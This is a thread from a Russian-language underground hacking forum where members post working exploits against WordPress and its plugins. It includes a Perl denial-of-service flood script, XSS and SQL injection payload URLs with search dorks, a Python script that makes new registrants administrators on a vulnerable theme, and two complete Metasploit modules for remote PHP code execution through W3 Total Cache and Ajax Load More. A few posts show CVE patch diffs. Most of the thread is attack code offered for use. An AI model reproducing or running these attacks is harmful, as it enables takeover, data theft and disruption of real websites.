Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack > Эксплоиты и уязвимости

Ответ
 
Опции темы Опции просмотра

Старый 11.09.2012, 13:29   #31
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Wordpress Login Page Denial of Service

Код:
#!/usr/bin/perl
#####################################
# Wordpress Login Page Denial of Service
# Code Written By Amir
# Www.IrIsT.Ir
# Greats : B3HZ4D - nimaarek - Mikili - Dead.Zone - C0dex - TaK.FaNaR - Nafsh
#####################################
use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Wordpress Login Page Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /Wordpress\n";
print "################################################# \n";
exit();
}
for($i=0; $i<99999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "action=rp&key=1111111111111111111111111111111111111&login=True";
$pack.= "POST " .$path. "/wp-login.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}
  Ответить с цитированием

Старый 18.09.2012, 23:00   #32
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Wordpress - Multiple XSS Vulnerability

Код:
./Title Exploit : Wordpress - Multiple XSS Vulnerability
 ./CMS Version   : Wordpress v.3.4.2 (Last Version)
 ./WebApps URL   : http://www.wordpress.org/
 ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
 ./Security Risk : [ High Level ]
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
 ./Time & Date   : September, 17 2012. 10:27 AM. Jakarta, Indonesia.
Код:
 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purpos Only                |||
 |||               Author Will Be Not Responsible For Any Damage               |||

[ Information Content ]
[ Vulnerability Details ]
  • 1.1 Vulnerability XSS WP-Post.
  • 1.2 Vulnerability XSS WP-Page.
  • 1.3 Vulnerability XSS WP-MediaLibrary.

[ XSS CODE ]
Код:
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
 <script>window.open("http://www.google.com/")</script>
[ Exploit Report ]
1.2. Create / Edit WP-Page:
1.3. Add / Edit WP-Media Library:
Script XSS will be Affected:
  Ответить с цитированием
Респектов за этот пост: 2

Старый 02.10.2012, 05:10   #33
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Код:
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()

ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
  Ответить с цитированием

Старый 09.10.2012, 01:46   #34
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Wordpress spider calendar Plugin Multiple Vulnerabilities

Код:
Dork: N/A
 
 Date: [02-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://wordpress.org/extend/plugins/spider-calendar/
 
 Version: 1.0.1
 
 License: Non-Commercial

 Demo: http://wpdemo.web-dorado.com/spider-calendar/

 Download: http://downloads.wordpress.org/plugin/spider-calendar.zip
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt
Цитата:
Descripcion Plugin Wordpress:

Spider Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your events and displaying them in a calendar format, then Spider Calendar is the best solution. Maybe you just want to have a quick look at your calendar to remind yourself about the future appointments? It will be great if calendar extension will be able to show all events, display them in a widget as a beautiful and customizable calendar on your website. Spider WordPress Calendar is an extraordinary user friendly calendar.
Exploit:

XSS : Cross-site scripting

Код:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251<ScRiPt >prompt()<%2fScRiPt>&day=01&ev_ids=1&eventID=1&theme_id=5
Код:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,0x3c7363726970743e616c657274282244344e42345220576173204865726522293c2f7363726970743e,1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=http://127.0.0.1/spider-calendar/

SQL : SQL injection

Код:
http://127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=

HPP : HTTP Parameter Pollution (HPP)

Код:
http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R >> 127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5&d4nb4r=d4nb4r
source:bugsearch
  Ответить с цитированием

Старый 30.10.2012, 20:48   #35
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Wordpress 3.4 Cross-Site Scripting Vulnerability

Код:
#############################
#
# Exploit Title : Wordpress 3.4 Cross-Site Scripting Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir/forum/
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : intext:"Powered By Wordpress"
#
#############################
#
# Expl0iTs :
#
# [Target]/wp-cron.php?doing_wp_cron=[Xss]
#
#
# C0de :
#
# $doing_wp_cron = $_GET[ 'doing_wp_cron' ];

#
#
#############################
  Ответить с цитированием
Респектов за этот пост: 2

Старый 31.01.2013, 17:28   #36
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Код:
##############
# Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : ww.ashiyane.org
#
# Security Risk : MEdium - SQL Injection
#
# Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=
#
##############
#Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]
#
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
  Ответить с цитированием
Юзеру Хулиган выразили Респект за этот пост:

Старый 01.05.2013, 21:57   #37
bit
 
Аватар для un1k0
 
un1k0 вне форума
Регистрация: 26.04.2013
Сообщений: 27
Респекты: 5
Wordpress W3 Total Cache PHP Code Execution

Код:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress W3 Total Cache PHP Code Execution',
      'Description'    => %q{
          This module exploits a PHP Code Injection vulnerability against Wordpress plugin
        W3 Total Cache for versions up to and including 0.9.2.8.  WP Super Cache 1.2 or older
        is also reported as vulnerable.  The vulnerability is due to the handling of certain
        macros such as mfunc, which allows arbitrary PHP code injection.  A valid post ID is
        needed in order to add the malicious comment.  If the POSTID option isn't specified,
        then the module will automatically bruteforce one.  Also, if anonymous comments
        aren't allowed, then a valid username and password must be provided.  In addition,
        the "A comment is held for moderation" option on Wordpress must be unchecked for
        successful exploitation.  This module has been tested against Wordpress 3.5 and
        W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.
      },
      'Author'  =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'hdm', # Metasploit module
          'Christian Mehlmauer' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '92652' ],
          [ 'BID', '59316' ],
          [ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
          [ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        => [ ['Wordpress 3.5', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 17 2013'
      ))
 
      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the wordpress application", "/wordpress/" ]),
          OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
          OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
          OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
        ], self.class)
  end
 
  def peer
    return "#{rhost}:#{rport}"
  end
 
  def require_auth?
    @user = datastore['USERNAME']
    @password = datastore['PASSWORD']
 
    if @user and @password and not @user.empty? and not @password.empty?
      return true
    else
      return false
    end
  end
 
  def get_session_cookie(header)
    header.split(";").each { |cookie|
      cookie.split(" ").each { |word|
        if word =~ /(.*logged_in.*)=(.*)/
          return $1, $2
        end
      }
    }
    return nil, nil
  end
 
  def login
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "wp-login.php"),
        'method' => 'POST',
        'vars_post' => {
          'log' => @user,
          'pwd' => @password
        }
      })
 
    if res and res.code == 302 and res.headers['Set-Cookie']
      return get_session_cookie(res.headers['Set-Cookie'])
    else
      return nil, nil
    end
 
  end
 
  def check_post_id(uri)
    options = {
      'method' => 'GET',
      'uri'    => uri
    }
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
    res = send_request_cgi(options)
    if res and res.code == 200 and res.body =~ /form.*action.*wp-comments-post.php/
      return true
    elsif res and (res.code == 301 or res.code == 302) and res.headers['Location']
      location = URI(res.headers["Location"])
      uri = location.path
      uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
      return check_post_id(uri)
    end
    return false
  end
 
  def find_post_id
    (1..1000).each{|id|
      vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0
      res = check_post_id(normalize_uri(target_uri) + "/?p=#{id}")
      return id if res
    }
    return nil
  end
 
  def post_comment
    php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
    vars_post = {
      'comment' => php_payload,
      'submit' => 'Post+Comment',
      'comment_post_ID' => "#{@post_id}",
      'comment_parent' => "0"
    }
    vars_post.merge!({
      'author' => rand_text_alpha(8),
      'email' => "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
      'url' => rand_text_alpha(8),
    }) unless @auth
 
    options = {
      'uri' => normalize_uri(target_uri.path, "wp-comments-post.php"),
      'method' => 'POST'
    }
    options.merge!({'vars_post' => vars_post})
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
 
    res = send_request_cgi(options)
    if res and res.code == 302
      location = URI(res.headers["Location"])
      uri = location.path
      uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
      return uri
    else
      return nil
    end
  end
 
  def exploit
 
    @auth = require_auth?
 
    if @auth
      print_status("#{peer} - Trying to login...")
      @cookie_name, @cookie_value = login
      if @cookie_name.nil? or @cookie_value.nil?
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Login wasn't successful")
      end
    else
      print_status("#{peer} - Trying unauthenticated exploitation...")
    end
 
    if datastore['POSTID'] and datastore['POSTID'] != 0
      @post_id = datastore['POSTID']
      print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
    else
      print_status("#{peer} - Trying to brute force a valid POST ID...")
      @post_id = find_post_id
      if @post_id.nil?
        fail_with(Exploit::Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
      else
        print_status("#{peer} - Using the brute forced POST ID #{@post_id}...")
      end
    end
 
    random_test = rand_text_alpha(64)
    @sum = Rex::Text.sha1(random_test)
 
    print_status("#{peer} - Injecting the PHP Code in a comment...")
    post_uri = post_comment
    if post_uri.nil?
      fail_with(Exploit::Failure::Unknown, "#{peer} - Expected redirection not returned")
    end
 
    print_status("#{peer} - Executing the payload...")
    options = {
      'method' => 'GET',
      'uri'    => post_uri,
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded),
        'Sum' => random_test
      }
    }
    options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
    res = send_request_cgi(options)
    if res and res.code == 301
      fail_with(Exploit::Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
    end
  end
 
  def check
    res = send_request_cgi ({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })
 
    if res.nil?
      return Exploit::CheckCode::Unknown
    end
 
    if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/
      version = $1
      if version <= "0.9.2.8"
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    end
 
    if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/)
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Unknown
 
  end
end
  Ответить с цитированием

Старый 02.08.2014, 00:45   #38
bit
 
Аватар для apps
 
apps вне форума
Регистрация: 18.03.2011
Сообщений: 40
Респекты: 15
CVE-2014-0165
WordPress before 3.7.2 and 3.8.x before 3.8.2 allows remote authenticated users to publish posts by leveraging the Contributor role, related to wp-admin/includes/post.php and wp-admin/includes/class-wp-posts-list-table.php.

Уязвимый код
Цитата:
3.8/wp-admin/includes/class-wp-posts-list-table.php

Код:
endif; // post_type_supports author 

 if ( !$bulk ) : 
 if ( !$bulk && $can_publish ) :
    ?>
branches/3.8/src/wp-admin/includes/post.php
Код:
Index: branches/3.8/src/wp-admin/includes/post.php
===================================================================
--- a/branches/3.8/src/wp-admin/includes/post.php
+++ b/branches/3.8/src/wp-admin/includes/post.php
@@ -101,4 +101,8 @@
     $previous_status = $post_id ? get_post_field( 'post_status', $post_id ) : false;
 
+    if ( isset( $post_data['post_status'] ) && 'private' == $post_data['post_status'] && ! current_user_can( $ptype->cap->publish_posts ) ) {
+        $post_data['post_status'] = $previous_status ? $previous_status : 'pending';
+    }
+
     $published_statuses = array( 'publish', 'future' );
 
@@ -111,4 +115,8 @@
     if ( ! isset($post_data['post_status']) )
         $post_data['post_status'] = $previous_status;
+
+    if ( isset( $post_data['post_password'] ) && ! current_user_can( $ptype->cap->publish_posts ) ) {
+        unset( $post_data['post_password'] );
+    }
 
     if (!isset( $post_data['comment_status'] ))
@@ -171,4 +179,12 @@
     $post_data['post_mime_type'] = $post->post_mime_type;
 
+    if ( ! empty( $post_data['post_status'] ) ) {
+        $post_data['post_status'] = sanitize_key( $post_data['post_status'] );
+
+        if ( 'inherit' == $post_data['post_status'] ) {
+            unset( $post_data['post_status'] );
+        }
+    }
+
     $ptype = get_post_type_object($post_data['post_type']);
     if ( !current_user_can( 'edit_post', $post_ID ) ) {
@@ -188,7 +204,4 @@
     }
 
-    $post_data = _wp_translate_postdata( true, $post_data );
-    if ( is_wp_error($post_data) )
-        wp_die( $post_data->get_error_message() );
     if ( ( empty( $post_data['action'] ) || 'autosave' != $post_data['action'] ) && 'auto-draft' == $post_data['post_status'] ) {
         $post_data['post_status'] = 'draft';
@@ -211,4 +224,8 @@
     }
 
+    $post_data = _wp_translate_postdata( true, $post_data );
+    if ( is_wp_error($post_data) )
+        wp_die( $post_data->get_error_message() );
+
     // Post Formats
     if ( isset( $post_data['post_format'] ) )
@@ -332,4 +349,12 @@
     }
     unset($post_data['_status']);
+
+    if ( ! empty( $post_data['post_status'] ) ) {
+        $post_data['post_status'] = sanitize_key( $post_data['post_status'] );
+
+        if ( 'inherit' == $post_data['post_status'] ) {
+            unset( $post_data['post_status'] );
+        }
+    }
 
     $post_IDs = array_map( 'intval', (array) $post_data['post'] );
@@ -423,8 +448,23 @@
         }
 
+        $post_data['post_type'] = $post->post_type;
         $post_data['post_mime_type'] = $post->post_mime_type;
         $post_data['guid'] = $post->guid;
 
+        foreach ( array( 'comment_status', 'ping_status', 'post_author' ) as $field ) {
+            if ( ! isset( $post_data[ $field ] ) ) {
+                $post_data[ $field ] = $post->$field;
+            }
+        }
+
         $post_data['ID'] = $post_ID;
+        $post_data['post_ID'] = $post_ID;
+
+        $post_data = _wp_translate_postdata( true, $post_data );
+        if ( is_wp_error( $post_data ) ) {
+            $skipped[] = $post_ID;
+            continue;
+        }
+
         $updated[] = wp_update_post( $post_data );
 
@@ -570,8 +610,4 @@
         return edit_post();
 
-    $translated = _wp_translate_postdata( false );
-    if ( is_wp_error($translated) )
-        return $translated;
-
     if ( isset($_POST['visibility']) ) {
         switch ( $_POST['visibility'] ) {
@@ -589,4 +625,8 @@
         }
     }
+
+    $translated = _wp_translate_postdata( false );
+    if ( is_wp_error($translated) )
+        return $translated;
Добавлено через 7 минут

CVE-2014-0166
The wp_validate_auth_cookie function in wp-includes/pluggable.php in WordPress before 3.7.2 and 3.8.x before 3.8.2 does not properly determine the validity of authentication cookies, which makes it easier for remote attackers to obtain access via a forged cookie.

Цитата:
Index: branches/3.8/src/wp-includes/pluggable.php
================================================== =================
Код:
--- a/branches/3.8/src/wp-includes/pluggable.php
+++ b/branches/3.8/src/wp-includes/pluggable.php
@@ -544,5 +544,5 @@
     $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
 
-    if ( $hmac != $hash ) {
+    if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
         do_action('auth_cookie_bad_hash', $cookie_elements);
         return false;
  Ответить с цитированием

Старый 11.11.2015, 10:01   #39
::GraBBerZ.CoM::
 
Аватар для Хулиган
 
Хулиган вне форума
Регистрация: 01.01.1970
Адрес: 127.0.0.1
Сообщений: 2,525
Респекты: 2,670
Wordpress Ajax Load More PHP Upload Vulnerability

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress Ajax Load More
version 2.8.1.1. It allows to upload arbitrary php files and get remote code
execution. This module has been tested successfully on WordPress Ajax Load More
2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
},
'Author' =>
[
'Unknown', # Identify yourself || send an PR here
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8209']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Ajax Load More 2.8.1.1', {}]],
'DisclosureDate' => 'Oct 10 2015',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
], self.class
)
end

def check
check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
end

def username
datastore['WP_USERNAME']
end

def password
datastore['WP_PASSWORD']
end

def get_nonce(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'vars_get' => {
'page' => 'ajax-load-more-repeaters'
},
'cookie' => cookie
)

if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
return Regexp.last_match[1]
else
return nil
end
end

def exploit
vprint_status("#{peer} - Trying to login as #{username}")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

vprint_status("#{peer} - Trying to get nonce")
nonce = get_nonce(cookie)
fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

vprint_status("#{peer} - Trying to upload payload")

# This must be default.php
filename = 'default.php'

print_status("#{peer} - Uploading payload")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'alm_save_repeater',
'value' => payload.encoded,
'repeater' => 'default',
'type' => 'default',
'alias' => '',
'nonce' => nonce
},
'cookie' => cookie
)

if res
if res.code == 200 && res.body.include?('Template Saved Successfully')
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

print_status("#{peer} - Calling uploaded file")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
)
end
end
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 09:50



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot